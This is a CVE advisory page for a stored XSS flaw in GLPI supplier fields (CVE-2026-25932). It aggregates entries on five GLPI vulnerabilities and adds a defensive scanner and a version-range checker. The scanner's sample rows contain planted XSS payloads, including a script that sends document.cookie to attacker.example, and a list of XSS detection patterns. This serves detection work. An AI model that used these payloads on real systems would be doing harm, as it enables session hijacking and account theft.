CVE-2026-25932
Published 2026-04-06
Priority P4 · 21 · medium · 4.8 (CVSS 3.1)
CVSS 3.1 vector: AV:N / AC:L / PR:H / UI:R / S:C / C:L / I:L / A:N
EPSS: 0.28% (19.8th percentile)
GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in supplier fields. This vulnerability is fixed in 10.0.24.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| glpi-project | glpi | — | — |
| glpi-project | glpi | >= 0.60 < 10.0.24 | 10.0.24 |
CVSS provenance
NVD (v3.1): 4.8 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
OSV: 4.8 MEDIUM
Note that the CNA score carried by the VulDB and Wiz entries below is 7.2 (HIGH), while NVD's own assessment is 4.8 (MEDIUM) with PR:H. Which number drives triage depends on how widely the technician role is handed out in a given deployment: the attacker needs a technician account, but the payload is stored rather than reflected (S:C), so it fires in the browser of whoever later views the supplier record.
VulDB
glpi-project glpi up to 10.0.23 supplier cross site scripting (GHSA-m627-945g-x7xh / Nessus ID 305610)
vuldb · 2026-04-13 · CVSS 7.2
CVE-2026-25932 [HIGH]
A vulnerability has been found in glpi-project glpi up to 10.0.23 and classified as problematic. The affected functionality is not further specified. Manipulation of the argument supplier leads to cross-site scripting.
This vulnerability is tracked as CVE-2026-25932. The attack can be launched remotely. No exploit is available.
The affected component should be upgraded.
OSV
CVE-2026-25932: GLPI is a Free Asset and IT Management Software package
osv · 2026-04-07 · CVSS 4.8
CVE-2026-25932 [MEDIUM]
GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in supplier fields. This vulnerability is fixed in 10.0.24.
No detection rules found.
No public exploits indexed.
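With no detection rule indexed, the practical check after patching is to look at what technicians have already stored. The script below is an added example, not GLPI project code: it triages an exported set of supplier rows for HTML or JavaScript where plain text is expected, decoding entity and percent encoding first so an encoded payload is not missed, and shows the output encoding a fixed view must apply. The rows are constructed for the example and are shaped like an export of GLPI's glpi_suppliers table; the field list (name, address, website, comment, email) and the assumption that all of them must be plain text are this example's own, since the page does not say which supplier fields are affected.

```python
"""Added example, not GLPI project code: triage supplier records for stored
XSS payloads of the kind CVE-2026-25932 lets a technician save.

Rows are constructed for this example and shaped like an export of GLPI's
glpi_suppliers table; the field list (name, address, website, comment, email)
and the assumption that every one of them must be plain text are this
example's, since the page does not say which supplier fields are affected.
"""
from __future__ import annotations

import html
import re
import urllib.parse

# Ordered most- to least-specific; the first hit is the reason reported.
SUSPICIOUS = [
    ("script-tag",    re.compile(r"<\s*/?\s*script\b", re.I)),
    ("js-scheme",     re.compile(r"javascript\s*:", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("active-tag",    re.compile(r"<\s*(iframe|img|svg|object|embed|math|link|meta|base)\b", re.I)),
    ("any-tag",       re.compile(r"<\s*[a-z!/]", re.I)),
]

TEXT_FIELDS = ("name", "address", "website", "comment", "email")

# Constructed sample export: one clean row, three planted payloads, one benign '<'.
SAMPLE_ROWS = [
    {"id": 1, "name": "Acme Hardware Ltd", "address": "1 Example Street",
     "website": "https://acme.example", "comment": "Preferred vendor for laptops",
     "email": "sales@acme.example"},
    {"id": 2, "name": "Contoso <script>fetch('https://attacker.example/?c='+document.cookie)</script>",
     "address": "", "website": "https://contoso.example", "comment": "", "email": ""},
    {"id": 3, "name": "Northwind Traders", "address": "", "website": "javascript:alert(document.domain)",
     "comment": "", "email": "it@northwind.example"},
    {"id": 4, "name": "Fabrikam", "address": "", "website": "",
     "comment": "&lt;img src=x onerror=alert(1)&gt;", "email": ""},
    {"id": 5, "name": "Globex", "address": "", "website": "",
     "comment": "Discount < 5% on bulk orders", "email": ""},
]


def normalise(value: str) -> str:
    """Peel off entity and percent encoding (two passes) so a payload stored in
    encoded form is matched as well as a raw one."""
    for _ in range(2):
        value = urllib.parse.unquote(html.unescape(value))
    return value


def classify(value: str) -> str | None:
    """Name of the first suspicious pattern found in `value`, or None."""
    text = normalise(value)
    for reason, pattern in SUSPICIOUS:
        if pattern.search(text):
            return reason
    return None


def scan_rows(rows) -> list[dict]:
    """One finding per (row, field) that holds HTML/JS where plain text is expected."""
    findings = []
    for row in rows:
        for field in TEXT_FIELDS:
            value = row.get(field)
            if not isinstance(value, str) or not value:
                continue
            reason = classify(value)
            if reason:
                findings.append({"id": row["id"], "field": field,
                                 "reason": reason, "value": value})
    return findings


def render_text(value: str) -> str:
    """Encoding for an HTML text node or quoted attribute value: what a fixed
    view has to apply before a supplier field reaches the page."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"supplier {f['id']}: {f['field']} flagged as {f['reason']}: {f['value'][:60]!r}")
    print("rendered safely:", render_text(SAMPLE_ROWS[1]["name"]))
```

Run it against a real export by replacing SAMPLE_ROWS with the rows from your database; treat every finding as a lead to review by hand, since the patterns are deliberately broad and a legitimate comment can contain a stray `<`. Flagged rows predating the upgrade to 10.0.24 tell you the hole was used, not merely present.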
Wiz
CVE-2026-29047 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.2
CVE-2026-29047 [HIGH]: GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 10.0.0 to before 10.0.24 and 11.0.6, an authenticated user can perform a SQL injection via the logs export feature. This vulnerability is fixed in 10.0.24 and 11.0.6.
Source: NVD
Score: 8.8 (Severity HIGH) · CNA score: 7.2 · Published April 6, 2026
Affected technologies: GLPI
Public exploit: No · In CISA KEV: No (KEV release date N/A, due date N/A)
EPSS percentile: 7.4 · EPSS probability: N/A
Affected packages and libraries: cpe:2.3:a:glpi-project:glpi
Sources: Linux, severity HIGH, has fix, added Apr 09, 2026 · Windows, severity HIGH, has fix, added Apr 09, 2026 · Linux, severity HIGH, has fix, added …
Wiz
CVE-2026-26263 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.2
CVE-2026-26263 [HIGH]: GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's Search engine. This vulnerability is fixed in 11.0.6.
Source: NVD
Score: 9.8 (Severity CRITICAL) · CNA score: 8.1 · Published April 6, 2026
Affected technologies: GLPI
Public exploit: No · In CISA KEV: No (KEV release date N/A, due date N/A)
EPSS percentile: 8.3 · EPSS probability: N/A
Affected packages and libraries: cpe:2.3:a:glpi-project:glpi
Sources: Linux, severity CRITICAL, has fix, added Apr 09, 2026 · Windows, severity CRITICAL, has fix, added Apr 09, 2026 · Linux, severity CRITICAL, has fix, added …
Wiz
CVE-2026-26026 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.2
CVE-2026-26026 [HIGH]: GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, template injection by an administrator leads to RCE. This vulnerability is fixed in 11.0.6.
Source: NVD
Score: 7.2 (Severity HIGH) · CNA score: 9.1 · Published April 6, 2026
Affected technologies: GLPI
Public exploit: No · In CISA KEV: No (KEV release date N/A, due date N/A)
EPSS percentile: 14 · EPSS probability: N/A
Affected packages and libraries: cpe:2.3:a:glpi-project:glpi
Sources: Linux, severity HIGH, has fix, added Apr 09, 2026 · Windows, severity HIGH, has fix, added Apr 09, 2026 · Linux, severity HIGH, has fix, added Apr 10, 2026 · Windows, severity HIGH, has fix, added …
Wiz
CVE-2026-25932 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.2
CVE-2026-25932 [HIGH]: GLPI vulnerability analysis and mitigation
GLPI is a Free Asset and IT Management Software package. From 0.60 to before 10.0.24, an authenticated technician user can store an XSS payload in supplier fields. This vulnerability is fixed in 10.0.24.
Source: NVD
Score: 4.8 (Severity MEDIUM) · CNA score: 7.2 · Published April 6, 2026
Affected technologies: GLPI
Public exploit: No · In CISA KEV: No (KEV release date N/A, due date N/A)
EPSS percentile: 8.7 · EPSS probability: N/A
Affected packages and libraries: cpe:2.3:a:glpi-project:glpi
Sources: Linux, severity MEDIUM, has fix, added Apr 09, 2026 · Windows, severity MEDIUM, has fix, added Apr 09, 2026 · Linux, severity MEDIUM, has fix, added Apr 10, …
Wiz
CVE-2026-26027 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz · CVSS 7.2
CVE-2026-26027 [HIGH]: GLPI vulnerability analysis and mitigation
GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated user can store an XSS payload through the inventory endpoint. This vulnerability is fixed in 11.0.6.
Source: NVD
Score: 6.1 (Severity MEDIUM) · CNA score: 7.5 · Published April 6, 2026
Affected technologies: GLPI
Public exploit: No · In CISA KEV: No (KEV release date N/A, due date N/A)
EPSS percentile: 13 · EPSS probability: N/A
Affected packages and libraries: cpe:2.3:a:glpi-project:glpi
Sources: Linux, severity MEDIUM, has fix, added Apr 09, 2026 · Windows, severity MEDIUM, has fix, added Apr 09, 2026 · Linux, severity MEDIUM, has fix, added Apr 10, …
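The five GLPI advisories on this page (CVE-2026-25932 in the Affected table above, and CVE-2026-29047, CVE-2026-26263, CVE-2026-26026 and CVE-2026-26027 in the Wiz entries) carry three different affected ranges and two fixed-in versions, and a single install is usually hit by more than one. The script below is an added example, not GLPI project code: it maps an installed GLPI version onto those ranges and names the lowest fixed-in version that closes them. The ranges are transcribed from the page; reading "From 10.0.0 to before 10.0.24 and 11.0.6" as two branches (10.0.x before 10.0.24 and 11.0.x before 11.0.6) is an assumption made here, and pre-release tags are treated as sorting below the final release they precede.

```python
"""Added example, not GLPI project code: classify an installed GLPI version
against the affected ranges listed on this page for the five GLPI advisories
published 2026-04-06.

Ranges are transcribed from the page text. Reading "From 10.0.0 to before
10.0.24 and 11.0.6" as two branches (10.0.x before 10.0.24, 11.0.x before
11.0.6) is an assumption made here; check the upstream advisory before relying
on it.
"""
from __future__ import annotations

import re

# (CVE, [(lower bound inclusive, upper bound exclusive), ...], fixed-in versions)
ADVISORIES = [
    ("CVE-2026-25932", [("0.60", "10.0.24")], ["10.0.24"]),
    ("CVE-2026-29047", [("10.0.0", "10.0.24"), ("11.0.0", "11.0.6")], ["10.0.24", "11.0.6"]),
    ("CVE-2026-26263", [("11.0.0", "11.0.6")], ["11.0.6"]),
    ("CVE-2026-26026", [("11.0.0", "11.0.6")], ["11.0.6"]),
    ("CVE-2026-26027", [("11.0.0", "11.0.6")], ["11.0.6"]),
]

_VERSION_RE = re.compile(r"^\s*v?(\d+(?:\.\d+)*)(?:[-+.]?([A-Za-z].*))?\s*$")


def parse_version(text: str) -> tuple:
    """Turn '10.0.24-rc1' into a sortable key.

    Numeric parts are padded to three components so '0.60' compares as 0.60.0,
    and a pre-release tag sorts below the final release it precedes, so
    10.0.24-rc1 is still reported as affected by a 'before 10.0.24' range.
    """
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised GLPI version string: {text!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * max(0, 3 - len(nums))
    pre = m.group(2) or ""
    return (nums, 0 if pre else 1, pre)


def in_range(version: str, lower_inclusive: str, upper_exclusive: str) -> bool:
    return parse_version(lower_inclusive) <= parse_version(version) < parse_version(upper_exclusive)


def affected_by(version: str) -> list[str]:
    """CVE IDs from this page whose affected range contains `version`."""
    return [cve for cve, ranges, _ in ADVISORIES
            if any(in_range(version, lo, hi) for lo, hi in ranges)]


def recommended_upgrade(version: str) -> str | None:
    """Lowest fixed-in version above `version` among the advisories that affect
    it, or None when nothing on this page applies."""
    current = parse_version(version)
    hits = set(affected_by(version))
    candidates = {fix for cve, _, fixes in ADVISORIES if cve in hits
                  for fix in fixes if parse_version(fix) > current}
    return min(candidates, key=parse_version) if candidates else None


if __name__ == "__main__":
    for v in ("9.5.13", "10.0.23", "10.0.24-rc1", "10.0.24", "11.0.5", "11.0.6"):
        print(f"{v:12} affected by {affected_by(v) or 'nothing listed here'}; "
              f"upgrade to {recommended_upgrade(v)}")
```

Two consequences of the page's ranges are worth noticing in the output: a 10.0.23 install is hit by both the supplier XSS and the logs-export SQL injection and needs 10.0.24, while an 11.0.5 install is outside the CVE-2026-25932 range as the page states it yet carries the three 11.0-only issues plus CVE-2026-29047 and needs 11.0.6.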